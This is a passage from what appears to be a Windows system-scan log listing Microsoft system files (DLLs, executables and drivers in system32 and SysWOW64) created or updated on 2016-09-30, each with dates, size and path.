2016-09-30 06:32 - 2016-09-15 19:02 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll
2016-09-30 06:32 - 2016-09-15 18:58 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2016-09-30 06:32 - 2016-09-15 18:56 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManagerApi.dll
2016-09-30 06:32 - 2016-09-15 18:55 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
2016-09-30 06:32 - 2016-09-15 18:53 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-09-30 06:32 - 2016-09-15 18:52 - 00857600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-09-30 06:32 - 2016-09-15 18:50 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2016-09-30 06:32 - 2016-09-15 18:49 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2016-09-30 06:32 - 2016-09-15 18:49 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2016-09-30 06:32 - 2016-09-15 18:44 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-09-30 06:32 - 2016-09-15 18:43 - 07467520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-09-30 06:32 - 2016-09-15 18:42 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2016-09-30 06:32 - 2016-09-15 18:40 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-09-30 06:32 - 2016-09-15 18:40 - 00327680 _____ C:\WINDOWS\system32\wc_storage.dll
2016-09-30 06:32 - 2016-09-15 18:39 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2016-09-30 06:32 - 2016-09-15 18:39 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-09-30 06:32 - 2016-09-15 18:38 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2016-09-30 06:32 - 2016-09-15 18:38 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2016-09-30 06:32 - 2016-09-15 18:38 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-09-30 06:32 - 2016-09-15 18:37 - 00390144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2016-09-30 06:32 - 2016-09-15 18:37 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
2016-09-30 06:32 - 2016-09-15 18:36 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2016-09-30 06:32 - 2016-09-15 18:36 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2016-09-30 06:32 - 2016-09-15 18:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-09-30 06:32 - 2016-09-15 18:35 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll
2016-09-30 06:32 - 2016-09-15 18:35 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-09-30 06:32 - 2016-09-15 18:34 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll
2016-09-30 06:32 - 2016-09-15 18:34 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll
2016-09-30 06:32 - 2016-09-15 18:32 - 01037312 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll
2016-09-30 06:32 - 2016-09-15 18:30 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-09-30 06:32 - 2016-09-15 18:27 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-09-30 06:32 - 2016-09-15 18:25 - 13434368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-09-30 06:32 - 2016-09-15 18:23 - 03405824 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2016-09-30 06:32 - 2016-09-15 18:21 - 02538496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2016-09-30 06:32 - 2016-09-15 18:21 - 01491968 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-09-30 06:32 - 2016-09-15 18:21 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 01535488 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 00908800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 00845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2016-09-30 06:32 - 2016-09-15 18:20 - 00283648 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkssvc.dll
2016-09-30 06:32 - 2016-09-15 18:19 - 00903680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2016-09-30 06:32 - 2016-09-15 18:19 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2016-09-30 06:32 - 2016-09-15 18:16 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll
2016-09-30 06:31 - 2016-09-30 06:31 - 00646136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2016-09-30 06:31 - 2016-09-30 06:31 - 00496872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2016-09-30 06:31 - 2016-09-24 07:55 - 00406016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-09-30 06:31 - 2016-09-24 07:46 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-09-30 06:31 - 2016-09-24 07:44 - 02264064 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-09-30 06:31 - 2016-09-15 20:14 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-09-30 06:31 - 2016-09-15 19:37 - 00402352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ws2_32.dll
2016-09-30 06:31 - 2016-09-15 19:35 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-09-30 06:31 - 2016-09-15 19:35 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-09-30 06:31 - 2016-09-15 19:32 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-09-30 06:31 - 2016-09-15 19:30 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-09-30 06:31 - 2016-09-15 19:30 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-09-30 06:31 - 2016-09-15 19:30 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-09-30 06:31 - 2016-09-15 19:29 - 01377016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2016-09-30 06:31 - 2016-09-15 19:29 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2016-09-30 06:31 - 2016-09-15 19:29 - 00512416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2016-09-30 06:31 - 2016-09-15 19:29 - 00218008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2016-09-30 06:31 - 2016-09-15 19:29 - 00081760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2016-09-30 06:31 - 2016-09-15 19:29 - 00023392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys
2016-09-30 06:31 - 2016-09-15 19:28 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-09-30 06:31 - 2016-09-15 19:28 - 01353768 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-09-30 06:31 - 2016-09-15 19:28 - 01172472 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-09-30 06:31 - 2016-09-15 19:28 - 00498960 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2016-09-30 06:31 - 2016-09-15 19:27 - 05622088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2016-09-30 06:31 - 2016-09-15 19:27 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-09-30 06:31 - 2016-09-15 19:27 - 00553312 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-09-30 06:31 - 2016-09-15 19:27 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2016-09-30 06:31 - 2016-09-15 19:26 - 00090400 _____ (Microsoft Corporation) C:\WINDOWS\system32\devenum.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 00340320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 00262960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2016-09-30 06:31 - 2016-09-15 19:24 - 00764936 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-09-30 06:31 - 2016-09-15 19:23 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2016-09-30 06:31 - 2016-09-15 19:23 - 00170960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-09-30 06:31 - 2016-09-15 19:22 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-09-30 06:31 - 2016-09-15 19:22 - 02256080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-09-30 06:31 - 2016-09-15 19:22 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2016-09-30 06:31 - 2016-09-15 19:21 - 01218912 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-09-30 06:31 - 2016-09-15 19:20 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-09-30 06:31 - 2016-09-15 19:19 - 00361104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsmf.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 03893376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00955528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00856872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfreadwrite.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-09-30 06:31 - 2016-09-15 19:18 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2016-09-30 06:31 - 2016-09-15 19:17 - 20965248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-09-30 06:31 - 2016-09-15 19:17 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-09-30 06:31 - 2016-09-15 19:17 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-09-30 06:31 - 2016-09-15 19:16 - 07219672 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 02190176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-09-30 06:31 - 2016-09-15 19:16 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 01738040 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 01292640 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 00657760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-09-30 06:31 - 2016-09-15 19:16 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 00401760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-09-30 06:31 - 2016-09-15 19:16 - 00206096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-09-30 06:31 - 2016-09-15 19:16 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2016-09-30 06:31 - 2016-09-15 19:15 - 02446704 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-09-30 06:31 - 2016-09-15 19:15 - 00649568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-09-30 06:31 - 2016-09-15 19:15 - 00341936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2016-09-30 06:31 - 2016-09-15 19:15 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-09-30 06:31 - 2016-09-15 19:15 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2016-09-30 06:31 - 2016-09-15 19:14 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2016-09-30 06:31 - 2016-09-15 19:14 - 00988512 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2016-09-30 06:31 - 2016-09-15 19:14 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2016-09-30 06:31 - 2016-09-15 19:14 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2016-09-30 06:31 - 2016-09-15 19:13 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-09-30 06:31 - 2016-09-15 19:12 - 08158672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-09-30 06:31 - 2016-09-15 19:11 - 04673296 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-09-30 06:31 - 2016-09-15 19:11 - 00773168 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2016-09-30 06:31 - 2016-09-15 19:10 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2016-09-30 06:31 - 2016-09-15 19:10 - 00918848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2016-09-30 06:31 - 2016-09-15 19:06 - 01469120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-09-30 06:31 - 2016-09-15 19:06 - 01046880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-09-30 06:31 - 2016-09-15 19:06 - 00587968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-09-30 06:31 - 2016-09-15 19:06 - 00050880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-09-30 06:31 - 2016-09-15 19:03 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-09-30 06:31 - 2016-09-15 19:03 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2016-09-30 06:31 - 2016-09-15 19:01 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\findnetprinters.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00518656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ngccredprov.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2016-09-30 06:31 - 2016-09-15 19:00 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-09-30 06:31 - 2016-09-15 18:59 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovslegacy.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00491008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2016-09-30 06:31 - 2016-09-15 18:58 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlancfg.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.Ngc.dll
2016-09-30 06:31 - 2016-09-15 18:58 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.UserDeviceAssociation.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2016-09-30 06:31 - 2016-09-15 18:57 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-09-30 06:31 - 2016-09-15 18:56 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00413184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00262656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pdh.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DataExchange.dll
2016-09-30 06:31 - 2016-09-15 18:56 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetworkCollectionAgent.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2016-09-30 06:31 - 2016-09-15 18:55 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-09-30 06:31 - 2016-09-15 18:55 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\biwinrt.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webio.dll
2016-09-30 06:31 - 2016-09-15 18:54 - 00431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll
2016-09-30 06:31 - 2016-09-15 18:53 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll
2016-09-30 06:31 - 2016-09-15 18:53 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2016-09-30 06:31 - 2016-09-15 18:53 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 01358336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll
2016-09-30 06:31 - 2016-09-15 18:52 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2016-09-30 06:31 - 2016-09-15 18:51 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2016-09-30 06:31 - 2016-09-15 18:51 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2016-09-30 06:31 - 2016-09-15 18:50 - 07625728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-09-30 06:31 - 2016-09-15 18:50 - 07219200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-09-30 06:31 - 2016-09-15 18:50 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-09-30 06:31 - 2016-09-15 18:48 - 01321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2016-09-30 06:31 - 2016-09-15 18:48 - 01112576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Energy.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 22566912 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ffbroker.dll
2016-09-30 06:31 - 2016-09-15 18:45 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-09-30 06:31 - 2016-09-15 18:45 - 02642944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2016-09-30 06:31 - 2016-09-15 18:45 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll
2016-09-30 06:31 - 2016-09-15 18:44 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2016-09-30 06:31 - 2016-09-15 18:44 - 00209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAC3ENC.DLL
2016-09-30 06:31 - 2016-09-15 18:43 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2.dll
2016-09-30 06:31 - 2016-09-15 18:43 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll
2016-09-30 06:31 - 2016-09-15 18:43 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
2016-09-30 06:31 - 2016-09-15 18:43 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe
2016-09-30 06:31 - 2016-09-15 18:43 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2016-09-30 06:31 - 2016-09-15 18:43 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
